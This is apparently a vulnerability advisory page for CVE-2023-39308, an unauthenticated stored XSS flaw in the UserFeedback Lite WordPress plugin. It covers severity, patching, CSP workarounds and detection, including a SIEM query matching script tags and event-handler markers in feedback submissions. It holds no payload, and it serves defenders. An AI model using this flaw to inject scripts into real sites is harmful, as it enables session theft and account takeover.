CVE-2023-39308 – Unauthenticated stored cross-site scripting (XS... (How to Fix)

Q: How do I fix CVE-2023-39308?

1. Log into WordPress admin panel. 2. Navigate to Plugins > Installed Plugins. 3. Find UserFeedback Lite plugin. 4. Click 'Update Now' if update available. 5. If no update available, deactivate and delete plugin, then install fresh version from WordPress repository.

Q: What is the severity of CVE-2023-39308?

CVE-2023-39308 has a CVSS score of 7.1 (HIGH). Unauthenticated stored cross-site scripting (XSS) vulnerability in the UserFeedback WordPress plugin allows attackers to inject malicious scripts that execute when users view affected pages. This affects WordPress sites running UserFeedback plugin version 1.0.7 or earlier. The vulnerability requires no authentication, making it accessible to any visitor.

📋 TL;DR

Unauthenticated stored cross-site scripting (XSS) vulnerability in the UserFeedback WordPress plugin allows attackers to inject malicious scripts that execute when users view affected pages. This affects WordPress sites running UserFeedback plugin version 1.0.7 or earlier. The vulnerability requires no authentication, making it accessible to any visitor.

💻 Affected Systems

Products:

WordPress UserFeedback Lite plugin

Versions: <= 1.0.7

Operating Systems: Any OS running WordPress

Default Config Vulnerable: ⚠️ Yes

Notes: Affects all WordPress installations with vulnerable plugin versions enabled.

📦 What is this software?

Userfeedback by Monsterinsights

View all CVEs affecting Userfeedback →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator session cookies, perform account takeover, deface websites, or redirect users to malicious sites, potentially leading to complete site compromise.

🟠

Likely Case

Attackers inject malicious JavaScript to steal user session cookies or credentials, leading to unauthorized access to WordPress admin panels.

🟢

If Mitigated

With proper content security policies and input validation, impact is limited to potential data leakage from the specific vulnerable component.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Public proof-of-concept demonstrates unauthenticated exploitation via feedback submission forms.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.0.8 or later

Vendor Advisory: https://wordpress.org/plugins/userfeedback-lite/#developers

Restart Required: No

Instructions:

1. Log into WordPress admin panel. 2. Navigate to Plugins > Installed Plugins. 3. Find UserFeedback Lite plugin. 4. Click 'Update Now' if update available. 5. If no update available, deactivate and delete plugin, then install fresh version from WordPress repository.

🔧 Temporary Workarounds

Disable UserFeedback Plugin

all

Temporarily disable the vulnerable plugin until patched version is available.

wp plugin deactivate userfeedback-lite

Implement Content Security Policy

all

Add CSP headers to restrict script execution from untrusted sources.

Add to .htaccess: Header set Content-Security-Policy "default-src 'self'; script-src 'self'"
Add to nginx config: add_header Content-Security-Policy "default-src 'self'; script-src 'self'";

🧯 If You Can't Patch

Disable the UserFeedback plugin completely
Implement web application firewall rules to block XSS payloads in feedback submissions

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel > Plugins > Installed Plugins for UserFeedback Lite version 1.0.7 or earlier.

Check Version:

wp plugin get userfeedback-lite --field=version

Verify Fix Applied:

Verify plugin version is 1.0.8 or later in WordPress admin panel.

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests to /wp-admin/admin-ajax.php with feedback data containing script tags
Multiple feedback submissions from same IP with JavaScript payloads

Network Indicators:

HTTP requests containing <script> tags in feedback form parameters
Unusual outbound connections after feedback submission

SIEM Query:

source="wordpress.log" AND ("admin-ajax.php" AND "action=userfeedback" AND ("<script>" OR "javascript:" OR "onerror="))

📊 Metadata

CVE ID: CVE-2023-39308

CVSS v3 Score: 7.1 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

CWE: CWE-79

Published: September 29, 2023

Last Updated: February 5, 2025

🔗 References

https://patchstack.com/database/vulnerability/userfeedback-lite/wordpress-userfeedback-lite-plugin-1-0-7-cross-site-scripting-xss-vulnerability?_s_id=cve Third Party Advisory
https://revan-ar.medium.com/cve-2023-39308-wordpress-plugin-user-feedback-1-0-7-unauthenticated-stored-xss-db992a01686a Exploit,Third Party Advisory
https://patchstack.com/database/vulnerability/userfeedback-lite/wordpress-userfeedback-lite-plugin-1-0-7-cross-site-scripting-xss-vulnerability?_s_id=cve Third Party Advisory
https://revan-ar.medium.com/cve-2023-39308-wordpress-plugin-user-feedback-1-0-7-unauthenticated-stored-xss-db992a01686a Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-39308, you might also want to check these: